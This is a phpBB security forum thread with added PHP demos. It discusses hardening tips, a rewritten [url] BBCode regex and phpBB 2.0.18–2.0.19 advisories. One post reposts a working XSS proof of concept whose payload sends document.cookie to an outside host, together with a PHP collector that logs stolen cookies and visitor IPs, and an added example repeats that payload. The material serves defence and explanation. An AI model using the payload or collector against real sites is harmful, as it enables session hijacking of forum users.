In-My-Opinion.org

»How to protect your phpBB forum against hackers«







Ninja:
So what's the best way to protect my shared_config file, and if possible, can someone modify the Encrypt Your Config mod to work with the Shared Registration mod too?

That's not possible, since the decryption algorithm is based upon the installation path of your forum. Since you are using the same config.php for MULTIPLE installations it cannot be decrypted.


posted by knn




knn:
This is a general issue with a lot of scripts, not only with phpBB

You might do this:
Open "common.php"

I have added tip #15 which takes care of this


posted by knn
  

Another 2.0.18 Exploit?



Topic : phpBB <= 2.0.18 XSS Cookie Disclosure Proof of Concept

ExploitAlert Id : 193

Credit : jet

Date : 22.12.2005

Exploit Code :

# SecurityReason Source :
#

# More :

/******************************************************************

phpBB <= 2.0.18 XSS Cookie Disclosure Proof of Concept
-- 'the html is on exploit'

original exploit by: Maksymilian Arciemowicz (cXIb8O3) - 12/16/2005
--

proof of concept by: jet
--


develop a pure, lucid mind, not
depending upon sound, flavor,
touch, odor, or any quality.
- the diamond sutra

******************************************************************/

phpbb code:

<B C=">" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=null`style='font-size:0; X="<B ">'</B>

c.php:

<?php
// c.php: the collection endpoint requested by the payload above.
// Appends the stolen cookie, the victim's IP, the time and the referer to log.txt.
$cookie = $_GET['c'];
$ip = getenv('REMOTE_ADDR');
$date = date("m/d/Y g:i:s a");
$referer = getenv('HTTP_REFERER');
$fl = fopen('log.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
fclose($fl);
?>


posted by redred23
  



redred23:
Another 2.0.18 Exploit?

Sure, there are dozens of bugs like that in phpBB. But full path disclosure is a minor issue compared to getting your forum deleted.

Moreover the above hack only works if you allow HTML tags in your posts. You should turn them off. They are completely unnecessary and can be a source of many hacks.


posted by knn
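Added example, not code from the thread or from phpBB: a minimal PHP renderer that pushes the payload from the proof of concept above through an "HTML allowed" path and an "HTML disabled" path (plain htmlspecialchars), and sets the session cookie with HttpOnly as a second layer against cookie disclosure. The passthrough renderer is a simplification of phpBB's allowed-tags behaviour, and the cookie name is illustrative.

```php
<?php
// Added example (not code from the thread or from phpBB): why "Allow HTML in
// posts" turns the proof of concept above into a working cookie-disclosure
// attack, and what the hardened path does instead.

// Constructed sample post: the payload from the proof of concept, verbatim.
// Nowdoc, so PHP interprets nothing inside it.
$samplePost = <<<'POST'
<B C=">" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=null`style='font-size:0; X="<B ">'</B>
POST;

// Vulnerable path (simplified assumption): with HTML allowed, the post's tags
// reach the browser unchanged, so the expression() runs and c.php receives
// the victim's cookie.
function render_html_allowed(string $post): string
{
    return $post;
}

// Hardened path: HTML off. The post is data, never markup. ENT_QUOTES escapes
// both quote styles, so the text can never close an attribute either.
function render_html_disabled(string $post): string
{
    return htmlspecialchars($post, ENT_QUOTES, 'UTF-8');
}

// True when the rendered fragment contains no tag or attribute delimiters,
// i.e. the browser will display it as plain text.
function is_inert(string $rendered): bool
{
    return strpbrk($rendered, '<>"\'') === false;
}

// Second layer, independent of the post filter: the payload's only goal is
// document.cookie. A session cookie flagged HttpOnly is invisible to script,
// so the same XSS exfiltrates nothing. It can still act inside the victim's
// session, so this is a mitigation, not a fix.
function set_session_cookie(string $name, string $value): bool
{
    // name, value, expires (0 = session), path, domain, secure, httponly
    return setcookie($name, $value, 0, '/', '', true, true);
}

if (!headers_sent()) {
    // Cookie name is illustrative only.
    set_session_cookie('phpbb2mysql_sid', bin2hex(random_bytes(16)));
}

echo "HTML allowed (unsafe):\n", render_html_allowed($samplePost), "\n\n";
$safe = render_html_disabled($samplePost);
echo "HTML disabled:\n", $safe, "\n\n";
echo "inert: ", is_inert($safe) ? 'yes' : 'no', "\n";
```

Run it with `php example.php`: the first output is the payload as the browser would receive it, the second shows every `<`, `>`, `'` and `"` turned into an entity, and is_inert() confirms that nothing left can open a tag or attribute. The HttpOnly flag only protects the cookie value; it does nothing against an XSS that, for instance, submits an admin form on the victim's behalf.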
  

2.0.19 oy veh!



In your protection, you do this:
Quote:
phpBB asks you to use this code:

// matches a xxxx... code..
$patterns[] = "#\[url\]([\w]+?://[\w\#$%&~/.\-;:=,?@\[\]+]*?)\[/url\]#is";
$replacements[] = $bbcode_tpl['url1'];

// phpbb.com... code.. (no xxxx:// prefix).
$patterns[] = "#\[url\]((www|ftp)\.[\w\#$%&~/.\-;:=,?@\[\]+]*?)\[/url\]#is";
$replacements[] = $bbcode_tpl['url2'];

// xxxx... code..
$patterns[] = "#\[url=([\w]+?://[\w\#$%&~/.\-;:=,?@\[\]+]*?)\]([^?\n\r\t].*?)\[/url\]#is";
$replacements[] = $bbcode_tpl['url3'];

// phpbb.com... code.. (no xxxx:// prefix).
$patterns[] = "#\[url=((www|ftp)\.[\w\#$%&~/.\-;:=,?@\[\]+]*?)\]([^?\n\r\t].*?)\[/url\]#is";

Do you trust this monster? Me not.

It calls the [ url ] handling 4 times and has been used (prior to 2.0.17) to steal cookies/passwords. Since 2.0.17 the code has been fixed, but I still don't trust it.

Thus open bbcode.php and find the 4 lines that start with $patterns[] = "#\[url
and are followed by $replacements[] =


Delete all these 8 lines and replace all 8 lines with the following
$security_threat_chars = ' \t\r\n\'\"\`\[\]\<\>\\\\';
$text = preg_replace('$\[url=?.*?(http://|ftp://)?(www[.])?([a-zA-Z0-9-.]+)([^'.$security_threat_chars.']*).*?\[\/url\]$i','<a href="http://\\1\\2\\3\\4" title="http://\\1\\2\\3\\4" target="_blank" class="postlink">\\3...</a>',$text);
$text = preg_replace('$"http://(http://|ftp://)$i','"\\1',$text); // Replace a double "http://" to -> "http://"

A nice side effect is that • long URLs get cut and don't distort the width of your forum
• the "www." doesn't get displayed

So we are actually not only fixing a possible security hole but we are enhancing the URL handling

Now in phpBB's update to 2.0.19 they want to do the following, however that code is now GONE! What should I do (they have not answered me yet)
Quote:
#-----[ OPEN ]---------------------------------------------
#
includes/bbcode.php

#
#-----[ FIND ]---------------------------------------------
# Line 203
$patterns[] = "#\[url\]([\w]+?://[\w\#$%&~/.\-;:=,?@\[\]+]*?)\[/url\]#is";
$replacements[] = $bbcode_tpl['url1'];

// phpbb.com... code.. (no xxxx:// prefix).
$patterns[] = "#\[url\]((www|ftp)\.[\w\#$%&~/.\-;:=,?@\[\]+]*?)\[/url\]#is";

#
#-----[ REPLACE WITH ]---------------------------------------------
#
$patterns[] = "#\[url\]([\w]+?://([\w\#$%&~/.\-;:=,?@\]+]|\[(?!url=))*?)\[/url\]#is";
$replacements[] = $bbcode_tpl['url1'];

// phpbb.com... code.. (no xxxx:// prefix).
$patterns[] = "#\[url\]((www|ftp)\.([\w\#$%&~/.\-;:=,?@\]+]|\[(?!url=))*?)\[/url\]#is";

should I just skip this spot and change their other items or what... Silly and stupid, that's how I feel


posted by Sippenhaft
  Rebellion is the only way to reform!
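Added example, not code from the thread or from phpBB (phpBB's own four url1..url4 patterns are not reproduced): knn's single-pass [url] replacement from the tip quoted above, wrapped in a function and run over constructed sample posts, including a scheme injection, an attribute injection and one https link. The function names, the href_of() helper and the sample posts are mine.

```php
<?php
// Added example, not code from the thread or from phpBB: knn's single-pass
// [url] replacement (quoted in the post above) as a function, run over
// constructed sample posts.

function render_url_bbcode(string $text): string
{
    // Characters that must never reach the href attribute: whitespace,
    // quotes, backtick, square and angle brackets, backslash. As a PCRE
    // character class the string below reads [^ \t\r\n'"`\[\]<>\\].
    $security_threat_chars = ' \t\r\n\'\"\`\[\]\<\>\\\\';

    // One pattern for both [url]...[/url] and [url=...]...[/url]:
    //   group 1  optional scheme (http:// or ftp://)
    //   group 2  optional "www."
    //   group 3  host (letters, digits, '-', '.')
    //   group 4  rest of the URL up to the first threat character
    // Everything else between the tags is thrown away and the href is always
    // built as http:// + groups 1-4, so a javascript: scheme or a quote that
    // tries to open a new attribute never reaches the anchor.
    $text = preg_replace(
        '$\[url=?.*?(http://|ftp://)?(www[.])?([a-zA-Z0-9-.]+)([^' . $security_threat_chars . ']*).*?\[\/url\]$i',
        '<a href="http://\\1\\2\\3\\4" title="http://\\1\\2\\3\\4" target="_blank" class="postlink">\\3...</a>',
        $text
    );

    // Collapse the doubled prefix ("http://http://..." or "http://ftp://...").
    return preg_replace('$"http://(http://|ftp://)$i', '"\\1', $text);
}

// Pulls the href back out of the rendered anchor, to show what the browser
// would actually follow. Returns null when no anchor was produced.
function href_of(string $html): ?string
{
    return preg_match('/href="([^"]*)"/', $html, $m) ? $m[1] : null;
}

// Constructed sample posts (not from the thread).
$samples = [
    // plain forms
    '[url]www.example.org/wiki[/url]',
    '[url=http://www.example.org/a?b=1&c=2]Example[/url]',
    // scheme injection: group 3 swallows "javascript", the href still starts with http://
    '[url=javascript:alert(document.cookie)]click me[/url]',
    // attribute injection: the quote is a threat char, so everything after it is dropped
    '[url=http://example.org/" onmouseover="alert(1)]click[/url]',
    // limitation of the pattern: it only knows http:// and ftp://, so an https
    // link comes out as http://https://...
    '[url=https://www.example.org/]secure[/url]',
];

foreach ($samples as $post) {
    $html = render_url_bbcode($post);
    printf("%s\n  href: %s\n  html: %s\n\n", $post, href_of($html) ?? '(none)', $html);
}
```

Two things the run makes visible that the tip does not say. First, the replacement is safe by construction rather than by blacklisting: whatever sits between `[url=` and the host is discarded, and the href is forced to begin with `http://`. Second, the price of that simplicity is that any scheme other than http:// and ftp:// is mangled (the https sample links to `http://https://www.example.org/`), and the visible link text is always the bare host followed by "...", so check whether either matters on your board before applying it.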

2.0.19 oy veh part 2



They also have you changing items in the admin db utilities, which those that use knn's protection have removed. I learned something new, I guess

I can't tell if this update is just fluff or does some good.
US prisoner

What? When? Where? Why?

posted by Sippenhaft
  



Sippenhaft:
Now in phpBB's update to 2.0.19

Uff, these tinkers.
Sippenhaft:
they want to do the following, however that code is now GONE!

Actually I don't know what the new code prevents, so I cannot tell anything right now.


posted by knn
  



Sippenhaft:
They also have you changing items in the admin db utilities, which for those that use KNNs protection have removed

?


posted by knn
  



Quote:
?

Tip A: "admin_db_utilities.php" is probably the most important (= severe) of files and the most unimportant (= useless for everyday's admin's life). Simply delete (or rename) the file "admin/admin_db_utilities.php"
If an attacker should gain control over your administration panel then at least he has no control over your database. If you don't delete the above file, an attacker who logs in as admin can alter ANY data in your database or delete the database completely:
With the 3 words

They do some updates to this file. Soooo if you have removed it, you can't do their updates... Aaah, is there anything better than to post here and to drink something


posted by Sippenhaft
  



Sippenhaft:
They do some updates to this file. Soooo if you have removed it, you can't do their updates...

Remove this file from your webspace. Only copy it back when you need it. But of course you should apply updates to that file, so you have the newest version IF you need it.


posted by knn
  



Thanks for all the good information (Security Tips)

Peter. This is a very beautiful board also.

Kind Regards.

posted by Gismo1
  



Well I have finished the update and left YOUR security as is in the bbcode. I skipped their one step of:
Quote:
(the 2.0.19 "includes/bbcode.php" FIND / REPLACE WITH step, quoted in full in "2.0.19 oy veh!" above)

All seems fine! Thanks!


posted by Sippenhaft
  

phpBB 2.0.19 Cross Site Request Forgeries and XSS Admin



Is there a fix for the 2.0.19 exploit?

Details: SecurityAlert
Topic : phpBB 2.0.19 Cross Site Request Forgeries and XSS Admin
SecurityAlert Id : 31
SecurityRisk : Medium
Remote Exploit : Yes
Local Exploit : Yes
Exploit Given : Yes
Credit : Maksymilian Arciemowicz
Date : 3.2.2006

posted by phpbbsupport
  



phpbbsupport:
Is there a fix for the 2.0.19 exploit?

Let me say first: This exploit is CAUSED AGAIN by the amateurish programming of phpBB.

Let me say second: My tips protect you.


posted by knn
  

ERROR FOUND!



See IMO → Hacking attempt?

posted by Sippenhaft
  


